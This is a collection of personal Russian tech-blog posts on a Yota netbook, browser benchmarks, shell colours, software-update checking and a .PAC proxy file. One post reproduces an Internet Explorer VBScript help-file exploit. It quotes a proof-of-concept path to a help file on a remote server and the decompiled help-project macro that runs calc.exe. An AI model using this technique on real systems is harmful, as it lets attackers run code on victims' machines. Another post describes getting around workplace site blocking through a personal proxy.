Неделю назад приобрел нетбук с поддержкой Йоты. И только сегодня решил проверить качество связи.
Собственно тесты:




От себя добавлю: сразу заметил, что периодически меняется внешний IP, в тому же наблюдаются некоторые проблемы с отдачей - тест на Upload что на SpeedTest'е что на Yandex'е прошел не с первого раза. В целом, интернет есть, что не может не радовать. Во всяком случае, в Зеленограде. Теперь предстоит тест зоны покрытия и в различных помещениях. Дома уровень сигнала (CINR/RSSI) колеблется от 24 dB/-54 dBm у окна до 4 dB/-93 dBm в коридоре.

Утром коллега сообщил о новой уязвимости в IE связанной с VBScript. Новость была с Хабра, поэтому сразу пошел смотреть подробности: http://habrahabr.ru/blogs/infosecurity/86069/ редиректит нас на http://focus.ua/tech/103699 где, в сущности, нет ничего конкретного по технической стороне вопроса, что было вполне предсказуемо. Идем на СекуЛаб и быстро находим нужное - http://www.securitylab.ru/news/391250.php. Ага!
Смотрим ссылки по теме: http://www.securitylab.ru/vulnerability/391247.php, далее http://blogs.technet.com/msrc/archive/2010/02/28/i...d-internet-explorer-issue.aspx - не то, далее http://www.isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt - вот оно!

Proof-of-Concept is available here:

http://isec.pl/poc-isec27/

Второй тест проходит успешно - winhlp32.exe крэшится как надо, а вот с Calc.exe проблемы: big = "\\184.73.14.110\PUBLIC\test.hlp" не найден =\ Немного погуглив, находим http://www.exploit-db.com/exploits/11615 и архив с искомым файлом:

===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================

Скачиваем, проверяем - работает! Калькулятор успешно запустился! Но как?.. Начинаем копать: недолгие поиски привели к софтине HelpScribble. Для декомпиляции .hlp файла она посоветовала воспользоваться декомпиллером. Отлично! Качаем, запускаем, распаковываем test.hlp. На выходе два файла - test.rtf и test.hpj. Первый нам не нужен - он все равно пустой, а вот во втором мы находим искомое:

[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0

[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)

[FILES]
TEST.RTF

[MAP]
21KSYK4 1

Еще немного поисков и находим нужное - http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm

Подробнее по ссылке - http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm

Вот и все! =) На все про все ушло не более получаса.

Наверное, это одно из самых увлекательных занятий: тестирование очередной версии/сборки любимого браузера.
Так, как в последнее время было много обновлений. Я решил еще раз протестировать производительности основных браузеров, установленных у меня, используя популярный SunSpider JavaScript Benchmark.

Собственно график:


Таблица:

#	Браузер	Версия	Результат, ms
1	Google Chrome 4.0	4.0.223.11	796,0
2	Mozilla Firefox 3.7	3.7a1pre Gecko/20091101	1 537,2
3	Mozilla Firefox 3.6	3.6b1 Gecko/20091029	1 687,2
4	Mozilla Firefox 3.5	3.5.4 Gecko/20091016	2 061,0
5	Opera 10.10	10.10 Beta build 1848	5 315,2
6	Opera 10.01	10.01 build 1844	5 539,8
7	Opera 9.64	9.64 build 10487	6 358,6
8	Internet Explorer 8.0	8.0.6001.18702CO	8 500,2
9	K-Meleon 1.5	1.5.3 Gecko/20090331	18 549,8

ls
Устанавливаем переменную CLICOLOR:
и переменную LSCOLORS:

Где ExGxFxdxCxDxDxhbadExEx - это последовательности цветов (fb - foreground, background):


grep
Устанавливаем переменные GREP_COLOR и GREP_OPTIONS:


less (man)
Устанавливаем переменные LESS_TERMCAP_xx:

Вместо \033 должен быть сам символ (он же ESC, он же ^E). В ee (easy editor) достаточно нажать Ctrl+O и ввести код символа - 027.

Использованные материалы:
http://plug-and-pray.blogspot.com/2008/02/lscolors.html
http://habrahabr.ru/blogs/linux/65857/
http://www.opennet.ru/cgi-bin/openforum/vsluhboard...rum=vsluhforumID3&omm=0&m=1l#5

Писал функцию для парсинга файлов АвтоАпгрейдера и решил поискать документацию по нему. А в результате подобрал запрос для поиска соотв. файлов: http://www.google.ru/search?hl=ru&client=opera&rls...D0%B8%D1%81%D0%BA&lr=&aq=f&oq=

Практически у всех в заголовке есть блок вида:

code:
#############################################################

#  Generated by AutoUpgrader Pro at: m/d/Y H:i:s AM  #

#############################################################

Компьютеры появились достаточно давно, и изначально основной их целью была автоматизация неких процессов, в частности, вычислений.
Сейчас многие забыли об этом и используют компьютеры лишь для игр и серфинга в Сети. Я давно задумывался об автоматизации различных рутинных процессов, но каждый раз написание соответствующих программ оказывалось куда более менее эффективным занятием, чем выполнение тех же операций вручную. Но вот настал день, когда что-то изменилось...

Собирать различные программы я начал еще лет с 15. Потом появился интернет, форум в локалке, где я вскоре стал модератором раздела Windows Software. Поначалу программ было не не много, я учился в школе и было не сложно найти время для обновления коллекции. Но постепенно количество программ росло, а времени становилось все меньше и постепенно я перестал следить за обновлениями. Равно как и перестал тестировать программы - работа занимала большую часть суток.
Теперь же, когда я освободился от постоянной работы (перейдя на фриланс), от института с ненужными походами на лекции =), я снова обратил свой взгляд на устаревающую коллекцию софта и со свежими силами начал приводить её в порядок.
Сразу же стало понятно, что следить за обновлениями более, чем 700 программ практически нереально. К тому же с ростом программерского стажа и изучением новых технологий росла и моя лень: зачем проверять обновления самому? Пусть за меня это делает компьютер =) Так зародилась идея системы автоматической проверки обновлений, которая позднее переросла в полноценный FTP менеджер.
На данный момент разработка все еще находится на стадии глубокой альфы, но уже вполне работоспособна. Из 32-х обработанных мною программ (на момент написания статьи) имеются алгоритмы проверки обновлений для 23-х. Среди них такие как Opera, Miranda IM, Google Chrome, Your Uninstaller, AIMP2, 7-ZIp, EmEditor, K-Lite Codek и Mega Codec Pack, Sony Vegas, UltraISO и другие.
Изначально все было реализовано одним файлов и при каждой загрузке страницы проверялись обновления, но количество переработанных программ росло, а с ними и время загрузки страницы. Таким образом решено было разделить систему на две части:
1. Сканер обновлений.
Запускается по крону с определенной периодичностью (раз в час), поочередно соединяется с серверами обновлений различных программ и получает данные о последних версиях. Все полученные данные кэшируются в виде XML файла.
2. Веб-интерфейс.
Собственно, сама страница со списком переработанных программ, на которой также отображаются данные о последних версиях.
Ниже выводится краткая статистика: процентные отношения программ, для которых проверяются обновления и всех переработанных программ к общему количеству и те же значения в числовом виде: количество программ для которых проверяются обновления/количество подготовленных программ/общее количество программ в коллекции.

На данный момент веб-интерфейс доступен по адресу http://www.neolite.ru/ftp/updates.pl

Я давно думал о том, чтобы написать систему управления своей коллекцией софта, но только недавно нашлось время. И первым шагом было автоматизировать проверку новых версий программ. Большинство программ не имеют встроенного механизма проверки наличия новых версий и тем более, автоматического обновления, поэтому приходилось информацию о них получать методом парсинга страниц офф. сайтов. В тоже время глупо было бы не воспользоваться имеющимися системами, учитывая что они дают куда более точную информацию о новых версиях. Итак, начнем с самого крепкого орешка - Оперы. На то, чтобы понять как работает её система обновлений у меня ушло 3 дня, поэтому я просто не поделиться полученной информацией =)

На данный момент Opera использует два протокола проверки наличия новых версий:

1. Используется для обновления текущих стабильных версий 9.xx.

Шифрование не используется, все передается по протоколу HTTP. Сервер обновлений - xml.opera.com.
Проверить его работу можно очень просто: достаточно перейти по ссылке http://xml.opera.com/update/. Если сделать это в опере - вам предстанет XML документ с перечислением последних версий для различных локализаций.

Читать далее

Вот и подошел к концу первый курс. Осталась лишь досдать сессию. Но это все лирика. Сегодня речь пойдет про .PAC файлы.

Началось все с того, что, как во на многих фирмах, нам прикрыли контакт и одноклассники. На одноклассники мне, конечно, положить, а вот контакт... Просто так с этим мириться я не собирался, тем более, что на моем сервере уже давно была поднята прокся. Какое-то время я так и сидел: периодически то переключаясь на неё, чтобы попасть ВКонтакт, и отключая, чтобы нормально работать. Не скажу, чтобы меня это сильно напрягало, но хотелась большего автоматизма: чтобы она включалась сама в зависимости от того, на какой сайт я лезу. И тут я обратил свое внимание на строку "Использовать указанный URL для автоматической настройки прокси" в FF.
Эта строка долгое время не давала мне покоя, и в один прекрасный день я решил попробовать узнать, а что же это должен быть за хитрый URL такой? Результатом недолгих поисков стала ссылка на скрипт автонастройки прокси одного из провайдеров. Немного модифицировав его я получил желаемое: если я пытался попасть на одноклассники или контакт, автоматически FF переключался на работу через прокси. В любом другом случае соединение было прямым =) А вот и сам скриптик proxy.pac:


Подробнее про создание скриптов автонастройки прокси вы можете прочитать здесь: http://wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy-live.html